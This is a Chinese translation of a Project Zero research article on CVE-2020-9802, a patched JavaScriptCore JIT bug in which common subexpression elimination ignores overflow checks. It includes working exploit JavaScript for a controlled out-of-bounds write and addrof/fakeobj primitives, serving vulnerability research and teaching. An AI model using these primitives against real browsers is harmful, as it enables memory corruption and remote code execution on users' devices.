本系列文章由三篇组成,重点介绍在现代web浏览器中挖掘和利用JavaScript引擎漏洞过程中所面临的各种技术挑战,并对当前的漏洞利用缓解措施进行评估。本文涉及的漏洞为CVE-2020-9802,该漏洞已经在iOS 13.5中得到了修复;而针对该漏洞缓解措施的绕过漏洞CVE-2020-9870和CVE-2020-9910,也已经在iOS 13.6中得到了相应的修复。
在2020年,浏览器中的渲染器将曝出什么样的漏洞呢?在今年一月份的时候,我就尝试回答这个问题。因为这是我最喜欢的领域之一,所以,我想亲自挖一个JIT编译器漏洞;并且,最让我心仪的,恰恰是那些fuzzer很难找到的漏洞类型,最好是从未出现过的。
由于WebKit浏览器具有当代最高级的漏洞利用缓解措施,包括PAC和APRR等基于硬件的缓解措施,因此,WebKit自然而然就成为了首选研究对象,更准确的说,应该是它所使用的JavaScript引擎:JavaScriptCore(JSC)。
在这个系列文章中,我们将为读者:
· 简要介绍JIT引擎,特别是其公共子表达式消除(CSE)优化技术。
· 阐释一个JIT编译器漏洞(CVE-2020-9802),该漏洞是由于CSE优化不当所致;以及如何利用该漏洞在JSC堆上进行越界读或写操作。
· 深入讨论WebKit渲染器在iOS平台上的各种漏洞利用缓解措施,特别是:StructureID随机化、Gigacage、指针认证(PAC)以及基于APRR(本质上就是每个线程内存页的权限)的JIT加固;这些缓解措施的工作机制、潜在的弱点,以及它们是如何被exploit所绕过的。
本系列文章的漏洞利用POC代码可以在这里找到。这些代码已经在iOS 13.4.1系统上的Mobile Safari浏览器以及macOS 10.15.4系统上的Safari 13.1浏览器上面进行测试并通过。
本系列文章力求通俗易懂,以便让没有强大的浏览器漏洞利用背景的安全研究人员和工程师也能够轻松理解。为此,我们将对漏洞利用代码开发过程中用到(或滥用)的各种JIT编译机制进行详细介绍。然而,需要注意的是,JIT编译器很可能是网络浏览器最复杂的攻击面之一(被利用的漏洞很可能特别复杂),因此,对初学者来说,这些内容并不是特别友好。另一方面,其中发现的漏洞也经常是最强大的漏洞,很有可能在未来相当长的时间内一直被利用。
关于JIT编译器
由于目前网上已经存在大量关于JIT编译器的优秀文章,因此,本节只对JavaScript JIT进行简单介绍/回顾。
在这里,我们将以下面的JavaScript代码为例进行介绍。
function foo(o, y) { let x = o.x; return x + y; } for (let i = 0; i < 10000; i++) { foo({x: i}, 42); }
由于JIT编译的开销非常大,所以,通常只对重复执行的代码进行编译处理。因此,函数foo将在解释器(或经济型“基准”JIT)中执行一段时间。在这段时间内,会收集相关的性能分析数据,例如代码的运行次数,以及对于数据类型的推断等。对于foo函数来说,对于其中的数据可能做出以下推断:
o: JSObject,属性为.x,偏移量为16。
x: Int32
y: Int32
之后,当优化JIT编译器最终启动时,首先将JavaScript源代码(或者,更可能是解释器字节码)翻译成JIT编译器自己的中间代码。对于DFG来说,JavaScriptCore的优化JIT编译器的工作是由DFGByteCodeParser完成的。
DFG IR中的函数foo最初可能是这样的:
v0 = GetById o, .x v1 = ValueAdd v0, y Return v1
在这里,GetById和ValueAdd是两种非常通用的(或者说是高级别的)操作,能够处理不同的输入类型(比如,ValueAdd操作也能用于串接字符串)。
接下来,JIT编译器会检查性能分析结果,并据此推测未来将继续使用相同的输入类型。就这里来说,它会做出以下推断:o的类型将一直是某种JSObject,而x和y的类型则一直为Int32。然而,由于无法保证这些推测始终是正确的,编译器必须对这些推测进行“维护”,通常的做法是采用运行时类型检查,因为这种检查的开销较小。
CheckType o, “Object with property .x at offset 16” CheckType y, Int32 v0 = GetByOffset o, 16 CheckType v0, Int32 v1 = ArithAdd v0, y Return v1
同时也要注意GetById和ValueAdd是如何被特化为更高效(但不那么通用)的GetByOffset和ArithAdd操作的。在DFG中,这种推测性优化会发生在许多地方,例如,前面讲到的DFGByteCodeParser中。
此时,IR代码中的数据实际上都被赋予了特定的类型,因为在推测维护机制的帮助下,是允许对类型进行推断的。接下来,会对代码进行各种优化,比如循环展开或常量合并等。关于DFG所做的优化工作的概述信息,大家可以从DFGPlan中提取出来。
最后,优化后的IR被翻译成机器代码。在DFG中,这是由DFGSpeculativeJIT直接完成的,而在FTL模式下,DFG的IR首先被翻译成另一种IR,即B3;而B3在经过进一步的优化后,才会被编译成机器代码。
接下来,我们将讨论一种具体的优化技术:公共子表达式消除(CSE)。
公共子表达式消除(CSE)
这种优化技术的中心思想是:找出重复的计算(或表达式),并将它们合并成单个计算。接下来,我们以下面的JavaScript代码为例进行介绍。
let c = Math.sqrt(a*a + a*a);
如果我们进一步假设a和b为基本数值类型,那么JavaScript JIT编译器可以将上述代码转换为:
let tmp = a*a; let c = Math.sqrt(tmp + tmp);
这样做的好处是,在运行时可以少执行一次ArithMul操作。这种优化方法称为公用子表达式消除(CSE)。
现在,请考虑以下JavaScript代码:
let c = o.a; f(); let d = o.a;
在这里,编译器不会在进行CSE优化时消除第二个属性加载操作,因为在这两个操作之间的函数调用可能会改变属性.a的值。
对于JSC来说,某操作是否可以(以及在什么情况下可以)进行CSE优化是由DFGClobberize决定的。对于ArithMul,DFGClobberize给出的结果是:
case ArithMul: switch (node->binaryUseKind()) { case Int32Use: case Int52RepUse: case DoubleRepUse: def(PureValue(node, node->arithMode())); return; case UntypedUse: clobberTop(); return; default: DFG_CRASH(graph, node, "Bad use kind"); }
其中,PureValue的def()表明,该计算不依赖任何上下文,因此,在给定相同输入的情况下,总会得到相同的结果。但是,请注意,PureValue是由该操作的ArithMode来参数化的,它规定了该操作是否应处理整数溢出(例如,通过向解释器求助)。在这种情况下,参数化可防止对整数溢出进行不同处理的两个ArithMul操作被相互替换。处理溢出的操作通常也称为“检查溢出问题的”操作,而“不检查溢出问题的”操作是不会检测或处理溢出问题的。
相反,对于GetByOffset(可用于属性加载),DFGClobberize则指出:
case GetByOffset: unsigned identifierNumber = node->storageAccessData().identifierNumber; AbstractHeap heap(NamedProperties, identifierNumber); read(heap); def(HeapLocation(NamedPropertyLoc, heap, node->child2()), LazyNode(node));
这实质上就是说,这个操作产生的值取决于NamedProperty“抽象堆”。因此,只有在两个GetByOffset操作之间没有对NamedProperties抽象堆(即存放属性值的内存空间)执行写操作时,消除第二个GetByOffset才是合理的。
漏洞概述
实际上,DFGClobberize并没有将ArithNegate操作的ArithMode考虑在内:
case ArithNegate: if (node->child1().useKind() == Int32Use || ...) def(PureValue(node)); // <- only the input matters, not the ArithMode
这可能会导致CSE用一个不检查溢出问题的ArithNegate操作来代替检查溢出问题的ArithNegate操作。对于ArithNegate(对32位整数求反)操作来说,整数溢出只可能发生在下述特定情况下:对INT_MIN:-2147483648求反时。这是因为2147483648无法表示为32位有符号整数,因此-INTMIN会导致整数溢出,并再次得到INTMIN。
通过研究DFGClobberize中CSE的定义,思考为什么某些PureValue(以及哪些PureValue)需要使用ArithMode进行参数化,然后搜索缺少该参数化的情况,就能找到这种类型的溢出漏洞。
其实,该漏洞的修复方法也非常简单:
- def(PureValue(node));
+ def(PureValue(node, node->arithMode()));
实际上,这就是让CSE将ArithNegate操作的arithMode(溢出检查模式和溢出非检查模式)考虑在内。这样,具有不同模式的两个ArithNegate操作将不允许相互替换。
除了ArithNegate,DFGClobberize也疏忽了ArithAbs操作的ArithMode。
请注意,这种类型的漏洞很难通过模糊测试检测出来,因为:
· fuzzer必须在相同的输入上创建两个ArithNegate操作,并且要具有不同的ArithMode;
· fuzzer需要触发ArithMode的差异会导致重大问题的情形,并且,还需要在这种情形下对INT_MIN值取反;
· 同时,除非引擎具有用于尽早检测此类问题的定制“消毒器”,并且除非进行了差异化模糊测试,否则fuzzer仍会把这种情况归结为内存违例或断言失败。如下一节所示,该步骤可能是最难的一步。
实现越界访问
下面显示的JavaScript函数,将利用上述漏洞,通过一个任意索引(在本例中为7)实现对JSArray的越界访问:
function hax(arr, n) { n |= 0; if (n < 0) { let v = (-n)|0; let i = Math.abs(n); if (i < arr.length) { if (i & 0x80000000) { i += -0x7ffffff9; } if (i > 0) { arr[i] = 1.04380972981885e-310; } } } }
接下来,我们逐步介绍如何构建该漏洞的PoC。在本节的末尾,还将为读者提供上述函数的注释版本。
首先,ArithNegate仅用于对整数求反(更通用的ValueNegate操作可以对所有JavaScript值求反),但在JavaScript规范中,数字通常是浮点值。因此,有必要向编译器“指出”输入值始终为整数。这很容易实现,方法是首先执行逐位运算,这样得到的总是32位有符号整数值:
n = n|0; // n will be an integer value now
这样,我们就可以构造一个不会对溢出问题进行检查的算术运算(以后将使用该运算对检查溢出问题的算术运算进行CSE处理):
n = n|0; let v = (-n)|0;
就本例来说,在DFGFixupPhase期间,n的求反操作将被转换为不会对溢出问题进行检查的ArithNeg操作。编译器将忽略溢出检查,因为这里进行求反的值的唯一用途是按位或运算,该运算对于溢出的值和“正确的”值的结果是一样的:
js> -2147483648 | 0 -2147483648 js> 2147483648 | 0 -2147483648
接下来,需要构造一个以n为输入并且检查溢出问题的算术运算。获得算术运算的一个有趣的方法是让编译器将一个ArithAbs操作强度折减(Strength reduction)为一个ArithNegate操作。只有当编译器能够证明n是负数时,才会出现这种情况。不过,实现这一点并非难事,因为DFG的IntegerRangeOptimization过程是路径敏感的:
n = n|0; if (n < 0) { // Compiler knows that n will be a negative integer here let v = (-n)|0; let i = Math.abs(n); }
在字节码解析过程中,对Math.abs的调用会先简化为ArithAbs操作,因为编译器能够证明该调用总是会导致mathAbs函数的执行,所以不妨用ArithAbs操作作为代替,因为该操作不仅具有相同的运行时语义,同时还无需在运行时调用函数。编译器实质上就是这样内联Math.abs的。之后,IntegerRangeOptimization过程会将ArithAbs转换为一个检查溢出问题的ArithNegate(ArithNegate必须检查溢出,因为n没有将INT_MIN排除在外)。这样一来,if语句里面的两个语句实质上就变成了下面的样子(DFG IR伪代码):
v = ArithNeg(unchecked) n i = ArithNeg(checked) n
其中,由于前述漏洞的缘故,经过CSE优化以后上述代码将变成:
v = ArithNeg(unchecked) n i = v
此时,如果用INT_MIN作为变量n的取值来调用误编译的函数,会导致变量i的值也变成INT_MIN,尽管它本应是一个正数。
到目前为止,这只是一个正确性问题,还算不上安全问题。把这个bug变成安全问题的一个(也可能是唯一的)方法是滥用一个已经在安全研究人员中广为人知的JIT优化:边界检查消除优化技术。
回到IntegerRangeOptimization过程,i的值已经被标记为正数。然而,要想发生边界检查消除,还必须确定该值小于被索引的数组的长度。这很容易实现。
function hax(arr, n) { n = n|0; if (n < 0) { let v = (-n)|0; let i = Math.abs(n); if (i < arr.length) { arr[i]; } } }
如果现在触发该漏洞,i的值将是INT_MIN,因此,这里将进行相应的比较并执行数组访问。然而,由于IntegerRangeOptimization错误地(尽管技术上将并不是它的错)将i确定为始终在边界内,因此边界检查将被移除。
在触发该漏洞之前,必须设法让JavaScript代码完成JIT编译。为此,只需重复执行代码达到一定次数即可。然而,对于arr的索引访问只会被(SSALoweringPhase)降级为CheckInBounds(稍后将被消除);只有当访问被推测为在边界内时,才会降级为不进行边界检查的GetByVal操作。如果在基线JIT的解释或执行过程中经常观察到访问是越界的,则不会出现这种情况。因此,在对函数进行“训练”的过程中,有必要使用合理的、位于边界内的索引。
for (let i = 1; i <= ITERATIONS; i++) { let n = -4; if (i == ITERATIONS) { n = -2147483648; // INT_MIN } hax(arr, n); }
在JSC中运行这段代码时,将会发生崩溃:
lldb -- /System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc poc.js (lldb) r Process 12237 stopped * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x1c1fc61348) frame #0: 0x000051fcfaa06f2e -> 0x51fcfaa06f2e: movsd xmm0, qword ptr [rax + 8*rcx] ; xmm0 = mem[0],zero Target 0: (jsc) stopped. (lldb) reg read rcx rcx = 0x0000000080000000
但是,这里的不便之处在于,越界索引(在rcx中)总是INT_MIN,因此,这里会访问数组后的0x80000000 * 8 = 16GB处的内存空间。尽管这个越界漏洞可以被利用,但绝不是一个最佳的利用原语。
实现具有任意索引的OOB访问的终极技巧是从i中减去一个常数,该常数会将INT_MIN变为任意正数。由于i被(DFG编译器)认为始终为正,因此,减法操作无需检查溢出问题,因此,即使发生溢出,也不会引起注意。
但是,由于减法会使有关下限的整数范围信息无效,因此之后需要执行额外的“if i > 0”检查,以再次触发边界检查消除优化。此外,由于减法会将训练过程中使用的整数转换为越界索引,因此只有在输入值为负时才有条件执行该减法。幸运的是,DFG编译器还不是太聪明,无法确定该条件永远不成立,在这种情况下,它会减法运算进行全面优化!
下面显示的还是原来的函数,不同之处在于,这里加了相关的注释。当经过了JIT编译且令n取值为INT_MIN时,将导致将受控的数值(0x0000133700001337)越界写入到内存中arr后面的JSArray的长度字段中。请注意,这一步的成功取决于正确的堆布局。但是,由于该漏洞非常强大,足以用于进行受控的OOB读取操作,因此可以在触发内存损坏之前确保存在正确的堆布局。
function hax(arr, n) { // Force n to be a 32bit integer. n |= 0; // Let IntegerRangeOptimization know that // n will be a negative number inside the body. if (n < 0) { // Force "non-number bytecode usage" so the negation // becomes unchecked and as such INT_MIN will again // become INT_MIN in the last iteration. let v = (-n)|0; // As n is known to be negative here, this ArithAbs // will become a ArithNegate. That negation will be // checked, but then be CSE'd for the previous, // unchecked one. This is the compiler bug. let i = Math.abs(n); // However, IntegerRangeOptimization has also marked // i as being >= 0... if (i < arr.length) { // .. so here IntegerRangeOptimization now believes // i will be in the range [0, arr.length) while i // will actually be INT_MIN in the final iteration. // This condition is written this way so integer // range optimization isn't able to propagate range // information (in particular that i must be a // negative integer) into the body. if (i & 0x80000000) { // In the last iteration, this will turn INT_MIN // into an arbitrary, positive number since the // ArithAdd has been made unchecked by integer range // optimization (as it believes i to be a positive // number) and so doesn't bail out when overflowing // int32. i += -0x7ffffff9; } // This conditional branch is now necessary due to // the subtraction above. Otherwise, // IntegerRangeOptimization couldn’t prove that i // was always positive. if (i > 0) { // In here, IntegerRangeOptimization again believes // i to be in the range [0, arr.length) and thus // eliminates the CheckBounds node, leading to a // controlled OOB access. This write will then corrupt // the header of the following JSArray, setting its // length and capacity to 0x1337. arr[i] = 1.04380972981885e-310; } } } }
Addrof/Fakeobj原语
此时,我们可以构建两个低级漏洞利用原语addrof和fakeobj。其中,addrof(Obj)原语用于返回给定JavaScript对象在内存中的地址(以双精度浮点数存储):
let obj = {a: 42}; let addr = addrof(obj); // 2.211548541e-314 (0x000000010acdc250 as 64bit integer) The fakeobj(addr) primitive returns a JSValue containing the given address as payload: let obj2 = fakeobj(addr); obj2 === obj; // true
实际上,这两个原语非常有用,在它们的帮助下,我们可以:突破堆的ASLR保护机制,将受控数据保存到已知地址中;此外,它们还能提供一种构造fake对象并将其“注入”到引擎中的方法。关于该漏洞的具体利用方法,我们将在第二篇文章中详细加以介绍。
除此之外,我们也可以使用两个具有不同存储类型的JSArray来实现这两个原语。具体来说,就是通过将存储(未经装箱处理的/原始的)双精度值的JSArray与存储JSValues(经过装箱处理的/标记值,例如指向JSObjects的指针)的JSArray重叠在一起来实现上述原语:
这样的话,就可以通过float_arr,像读写双精度浮点数那样来读写obj_arr中的指针值了:
let noCoW = 13.37; let target = [noCoW, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6]; let float_arr = [noCoW, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6]; let obj_arr = [{}, {}, {}, {}, {}, {}, {}]; // Trigger the bug to write past the end of the target array and // thus corrupting the length of the float_arr following it hax(target, n); assert(float_arr.length == 0x1337); // (OOB) index into float_arr that overlaps with the first element // of obj_arr. const OVERLAP_IDX = 8; function addrof(obj) { obj_arr[0] = obj; return float_arr[OVERLAP_IDX]; } function fakeobj(addr) { float_arr[OVERLAP_IDX] = addr; return obj_arr[0]; }
请注意,变量noCoW的用途有些不太直观:用来防止JSC将数组分配为写后复制数组,否则会导致错误的堆布局。
小结
实际上,本文介绍的一个“非标准的”JIT编译器漏洞。请记住,与这种类型的漏洞相比,有大量其他类型的(JIT)漏洞更容易被利用。另一方面,事实上,该漏洞的利用方法(到此为止)还没有进行详细介绍,因为本文的大部分篇幅都是在回顾JSC和JIT编译器的内部结构。
在下一篇文章中,我们将为读者介绍利用addrof和fakeobj原语实现任意读/写原语的各种方法。
本文翻译自:https://googleprojectzero.blogspot.com/2020/09/jitsploitation-one.html如若转载,请注明原文地址: